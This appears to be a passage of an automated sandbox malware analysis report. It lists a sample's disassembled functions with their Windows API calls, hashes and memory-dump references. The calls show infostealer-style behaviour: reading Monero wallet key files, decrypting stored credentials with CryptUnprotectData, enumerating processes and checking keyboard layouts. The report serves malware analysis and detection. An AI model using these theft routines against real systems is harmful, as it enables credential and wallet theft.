                            • Opcode ID: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                            • Instruction ID: 8f44192cde8f0c59372748a14491a97c52430196df6c574d0fe639ab145f8337
                            • Opcode Fuzzy Hash: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                            • Instruction Fuzzy Hash: 5791237290060897CB16FBB0EC56EED777DAB94308F40855DF90ADA541EE349F09CB92
                            Function 00779AE6 Relevance: 12.8, Strings: 9, Instructions: 1599COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Nx{$Qov[$W6}V$r}:${^Mx$'>~$*[$Ay$l=}
                            • API String ID: 0-3838544387
                            • Opcode ID: 72781a01f1004c8cebab541950271b35c0fc04298d2aff5e1775b34b999b647a
                            • Instruction ID: 6c69046b2185e78b5adae14c58bd97f6d4d26ea1258357dd05273de43e6c39f4
                            • Opcode Fuzzy Hash: 72781a01f1004c8cebab541950271b35c0fc04298d2aff5e1775b34b999b647a
                            • Instruction Fuzzy Hash: FCB206B36082149FE304AE2DDC8567AFBEAEFD4720F1A493DE6C4C3744EA3558058697
                            Function 003C7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,003D05AF), ref: 003C7BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003C7BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 003C7C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C7C62
                            • LocalFree.KERNEL32(00000000), ref: 003C7D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                            • Instruction ID: 17cf1d60a44c48f23c615e98031716b4f6528423e101a471ed6c012bb636206c
                            • Opcode Fuzzy Hash: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                            • Instruction Fuzzy Hash: FB415D7194021CABCB25DB94DC99FEEB7B8FF54704F204199E40AA6290DB742F85CFA1
                            Function 0077EAA2 Relevance: 10.3, Strings: 7, Instructions: 1536COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F{:=$de\$hC>s$i$_$sfoM$sfoM$xF1u
                            • API String ID: 0-1316170999
                            • Opcode ID: a3b7547ab521d4792f676162bcf3f4cb5525b1b3c57bef7c4b8d08593d0c777c
                            • Instruction ID: ab053a0bca62060d9e15e83c6d1adfb14ece745b8104dea6664acc1ea2d5b90c
                            • Opcode Fuzzy Hash: a3b7547ab521d4792f676162bcf3f4cb5525b1b3c57bef7c4b8d08593d0c777c
                            • Instruction Fuzzy Hash: C0B2E4F360C200AFE704AE2DEC8567ABBE5EF94720F16892DE6C4C7744EA3558418797
                            Function 003BE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003D0D73), ref: 003BE4A2
                            • StrCmpCA.SHLWAPI(?,003D14F8), ref: 003BE4F2
                            • StrCmpCA.SHLWAPI(?,003D14FC), ref: 003BE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                            • Instruction ID: cae9fdf192c7f3fac64f1f8c94414325effafbf5df59591fd10dfd917382d9fc
                            • Opcode Fuzzy Hash: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                            • Instruction Fuzzy Hash: AC124C7290061C9BDB1AFB60DC96FED7378AF54304F4041ADA50ADA191EF346F49CBA2
                            Function 0077B51E Relevance: 9.2, Strings: 6, Instructions: 1682COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2+k$MF1m$\}7$`c$fAU]$sz
                            • API String ID: 0-1251302725
                            • Opcode ID: b114735b526981fdf5099c641638c92c007e1554f885b2a231cfd0d34bfac973
                            • Instruction ID: 2b989d5a47f671d4aa16027000a1de1002fa3e50497738b769fca5955c6ce5c5
                            • Opcode Fuzzy Hash: b114735b526981fdf5099c641638c92c007e1554f885b2a231cfd0d34bfac973
                            • Instruction Fuzzy Hash: 4AB25BF360C204AFE3046E2DEC8577AFBD9EF94220F1A453DEAC5D3744EA3598058696
                            Function 003B9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                            • LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N;
                            • API String ID: 4291131564-1002446643
                            • Opcode ID: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                            • Instruction ID: 93ea7029b0fedafe253c75bf2e29026be616577140272f261b31caf22be047ee
                            • Opcode Fuzzy Hash: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                            • Instruction Fuzzy Hash: EE11AFB4240308EFEB10CF64DC95FAA77B5FB89704F208059FA199B390C7B6A901DB91
                            Function 003BC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                            • lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                            • lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                            • lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: a22307d8a4994be6895592253d016eec1a35c4ce24c6021dda1c231b2e325bc1
                            • Instruction ID: 19b463ccca9eb01b02e371e896b6914685e142726e512cd7d513208c31ab0115
                            • Opcode Fuzzy Hash: a22307d8a4994be6895592253d016eec1a35c4ce24c6021dda1c231b2e325bc1
                            • Instruction Fuzzy Hash: 484184B5D14219DFDB10DFA0DC84BFEB7B8BB48704F1045A9E509E6280D7749A84DF92
                            Function 003C6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 003C696C
                            • sscanf.NTDLL ref: 003C6999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69C0
                            • ExitProcess.KERNEL32 ref: 003C69DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                            • Instruction ID: 3e3166f1be83cf63d12d0a943f16e6e5b5e4db1bbadbc4c54f34334badb515a0
                            • Opcode Fuzzy Hash: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                            • Instruction Fuzzy Hash: 5321BAB5D14208ABCF05EFE4D945EEEB7B5BF58300F04852EE40AE3250EB745609DBA6
                            Function 003B7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003B724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003B7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003B72A4
                            • LocalFree.KERNEL32(?), ref: 003B72AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                            • Instruction ID: 7b0344d177731566c31b410a3b4cf4363b15ab9ef9c4f30f4222abd0fcd7c18a
                            • Opcode Fuzzy Hash: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                            • Instruction Fuzzy Hash: 620152B5A40208BBEB14DFE4CD49FAD7778EB44B04F104455FB09EB2C0C6B4AA04DB66
                            Function 003C9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C961E
                            • Process32First.KERNEL32(003D0ACA,00000128), ref: 003C9632
                            • Process32Next.KERNEL32(003D0ACA,00000128), ref: 003C9647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 003C965C
                            • CloseHandle.KERNEL32(003D0ACA), ref: 003C967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                            • Instruction ID: 2287f26e9c57474498a25ce06033287e39e502ad89ce26b2fb82101aa2c18adf
                            • Opcode Fuzzy Hash: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                            • Instruction Fuzzy Hash: 160129B5A00208ABCB11DFA5CC48FEDB7F8EB18350F004189A909D7280D774AE54DF52
                            Function 00780536 Relevance: 6.6, Strings: 4, Instructions: 1596COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
